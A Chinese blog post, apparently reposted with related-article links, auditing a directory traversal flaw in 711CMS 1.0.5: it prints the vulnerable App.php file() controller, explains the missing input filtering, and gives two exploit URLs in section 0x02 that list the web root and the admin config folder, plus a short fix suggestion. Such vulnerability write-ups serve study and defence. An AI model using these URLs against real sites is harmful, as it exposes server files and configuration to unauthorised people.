【代码审计】711cms_V1.0.5 目录遍历漏洞分析
0x00 环境准备
711CMS官网: https://www.711cms.com/
网站源码版本:711CMS 1.0.5 正式版(发布时间:2018-01-20)
程序源码下载:https://www.711cms.com/versions/711cms_V1.0.5.zip
测试网站首页:

0x01 代码分析
1、漏洞文件位置:/admin/controllers/App.php 第323-393行:
- public function file() {
- $token = $this->input->get('token', true);
- $time = $this->input->get('time', true);
- $folder = $this->input->get('folder',true);
- $folder = $folder ? $folder : '/';
- $type = $this->input->get('type', true);
- $folder = urldecode($folder);
- $arr_token = array(
- 10. 'folder' => $folder,
- 11. 'type' => $type,
- 12. 'time' => $time
- 13. );
- 14. $private = md5($this->input->server('HTTP_HOST') . $this->_site['auth_code']);
- 15. $token2 = appToken($arr_token, $private);
- 16. if ($token2 != $token) {
- 17. $folder = '/';
- 18. }
- 19. if (strpos($folder, '..') !== false || strpos($folder, ':') !== false) {
- 20. $folder = '/';
- 21. }
- 22.
- 23. $type = $type ? $type : 'apk|jpg|gif|png';
- 24. $this->_data['type'] = $type;
- 25.
- 26. $arr_type = explode('|', $type);
- 27. $arr_type_num = count($arr_type);
- 28. if ($folder) {
- 29. $dir = root_path($folder);
- 30. $arr_data = array();
- 31. $arr_data['folders'] = array();
- 32. $arr_data['apks'] = array();
- 33. $arr_data['images'] = array();
- 34. $scan_result = scandir($dir);
- 35. foreach ($scan_result as $key => $value) {
- 36. if ($value == '.' || $value == '..') {
- 37. continue;
- 38. }
- 39. if (is_dir($dir . $value)) {
- 40. $arr_data['folders'][] = array(
- 41. 'folder' => $value,
- 42. 'size' => filesize($dir . $value) ? filesize($dir . $value) : 0,
- 43. 'date' => filemtime($dir . $value) ? filemtime($dir . $value) : time() - 3600 * 12
- 44. );
- 45. } else {
- 46. $type = explode('.', $value);
- 47. $type = array_reverse($type);
- 48. if (in_array($type[0], $arr_type) && $arr_type_num == 1) {
- 49. $arr_data['apks'][] = array(
- 50. 'apk' => $value,
- 51. 'size' => filesize($dir . $value) ? filesize($dir . $value) : 0,
- 52. 'date' => filemtime($dir . $value) ? filemtime($dir . $value) : time() - 3600 * 12
- 53. );
- 54. }
- 55. if (in_array($type[0], $arr_type) && $arr_type_num > 1) {
- 56. $arr_data['images'][] = array(
- 57. 'image' => $value,
- 58. 'size' => filesize($dir . $value) ? filesize($dir . $value) : 0,
- 59. 'date' => filemtime($dir . $value) ? filemtime($dir . $value) : time() - 3600 * 12
- 60. );
- 61. }
- 62. }
- 63. }
- 64. $this->_data['file'] = $arr_data;
- 65. $this->_data['folder'] = $folder;
- 66. $this->_data['time'] = time();
- 67. $this->_data['private'] = $private;
- 68.
- 69. }
- 70. $this->loadView('/App/file');
71. }
这段函数获取参数进行简单的处理,然后验证token,根据$folder的值进行列目录,然后再根据$type选择类型展示。参数在传递过程中未进行任何有效过滤,
导致程序在实现上存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。
0x02 漏洞利用
1、登录后台,构造url,获取网站目录结构。
获取网站根目录Payload:
http://127.0.0.1/admin.php?c=App&m=file&folder=/&type=apk|jpg|gif|png

2、程序默认展示apk|jpg|gif|png四种类型的结果,我们可以通过改变$type的值来改变展示的类型。
http://127.0.0.1/admin.php?c=App&m=file&folder=/admin/config/&type=apk|jpg|gif|png|php

0x03 修复建议
1、正则判断用户输入的参数的格式,看输入的格式是否合法:这个方法的匹配最为准确和细致,但是有很大难度,需要大量时间配置规则。
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。

【代码审计】711cms_V1.0.5 目录遍历漏洞分析的更多相关文章
- 【代码审计】大米CMS_V5.5.3 目录遍历漏洞分析
0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...
- 【代码审计】CLTPHP_v5.5.3后台目录遍历漏洞分析
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...
- [cyber security][php]pfSense目录遍历漏洞分析
0×00 导言 pfSense是一个基于FreeBSD,专为防火墙和路由器功能定制的开源版本. 在本文中,我们将向大家介绍在pfSense的2.1.3以及更低版本中的CVE-2014-4690漏洞:对 ...
- 网络安全学习阶段性总结:SQL注入|SSRF攻击|OS命令注入|身份验证漏洞|事物逻辑漏洞|目录遍历漏洞
目录 SQL注入 什么是SQL注入? 掌握SQL注入之前需要了解的知识点 SQL注入情况流程分析 有完整的回显报错(最简单的情况)--检索数据: 在HTTP报文中利用注释---危险操作 检索隐藏数据: ...
- nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现
nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre ...
- Kali学习笔记31:目录遍历漏洞、文件包含漏洞
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 目录遍历漏洞: 应用程序如果有操作文件的功能,限制不严 ...
- HttpClient使用之下载远程服务器中的文件(注意目录遍历漏洞)
参考文献: http://bbs.csdn.net/topics/390952011 http://blog.csdn.net/ljj_9/article/details/53306468 1.下载地 ...
- 目录遍历漏洞简介 转载于h3c
参考文章: 攻防:目录遍历漏洞简介
- nginx目录遍历漏洞复现
nginx目录遍历漏洞复现 一.漏洞描述 Nginx的目录遍历与apache一样,属于配置方面的问题,错误的配置可导致目录遍历与源码泄露. 二.漏洞原理 1. 修改nginx.conf,在如下图位置添 ...
随机推荐
- E/MediaPlayer: start called in state 4, mPlayer(0xcc719a40)解决
在使用MediaPlayer播放音频时报出 E/MediaPlayer: start called in state 4, mPlayer(0xcc719a40)错误 贴出代码 mMediaPlaye ...
- Linux的内存管理
Linux的内存管理,实际上跟windows的内存管理有很相像的地方,都是用虚拟内存这个的概念,说到这里不得不骂MS,为什么在很多时候还有很大的物理内存的时候,却还是用到了pagefile. 所以才经 ...
- FPGA内部动态可重置PLL讲解(一)
SDRAM驱动需要两个时钟,一个是控制时钟,一个是驱动时钟,这两个时钟有一个相位差,如何产生高精度的时钟是SDRAM能够正常工作的关键,采用FPGA内部动态可重置PLL生成SDRAM所需要的时钟频率. ...
- Java如何使用finally块来捕捉异常?
在Java编程中,如何使用finally块来捕捉异常? 此示例显示如何使用finally块来通过使用e.getMessage()捕获运行时异常(Illegalargumentexception). p ...
- 使用Git之后出现android library引用失败
今天在做android项目的使用,因为使用了git做代码托管,我的工作空间是在F盘,而git仓库是在E盘,现在E盘的项目要用到F盘上的的android library项目.但是无论我怎么引用都报错误. ...
- Dataguard 主库与备库的Service_Name 不一致时,如何配置客户端TNSName
ORA11G_DG= (DESCRIPTION_LIST= (FAILOVER=on) (DESCRIPTION= (ADDRESS=(PROTOCOL = TCP)(HO ...
- Idea配置CheckStyle
1.安装CheckStyle 2.配置idea_checks.xml 3.启用CheckStyle idea_checks.xml: <?xml version="1.0"? ...
- git解决冲突(rebase版)
当使用git rebase碰到冲突时, git rebase <Remote Branch>/<Your Branch> 信息如下: error: Failed to merg ...
- json过滤某些属性 之@jsonignore
Jackson相关: 使用Jackson相关的注解时一定要注意自己定义的属性命名是否规范. 命名不规范时会失去效果.(例如Ename ,Eage 为不规范命名.“nameE”,“ageE”为规范命名) ...
- springmvc接口ios网络请求
springmvc: application/json;charset=utf-8的ios网络请求: 后台使用 @RequestBody注解参数接收: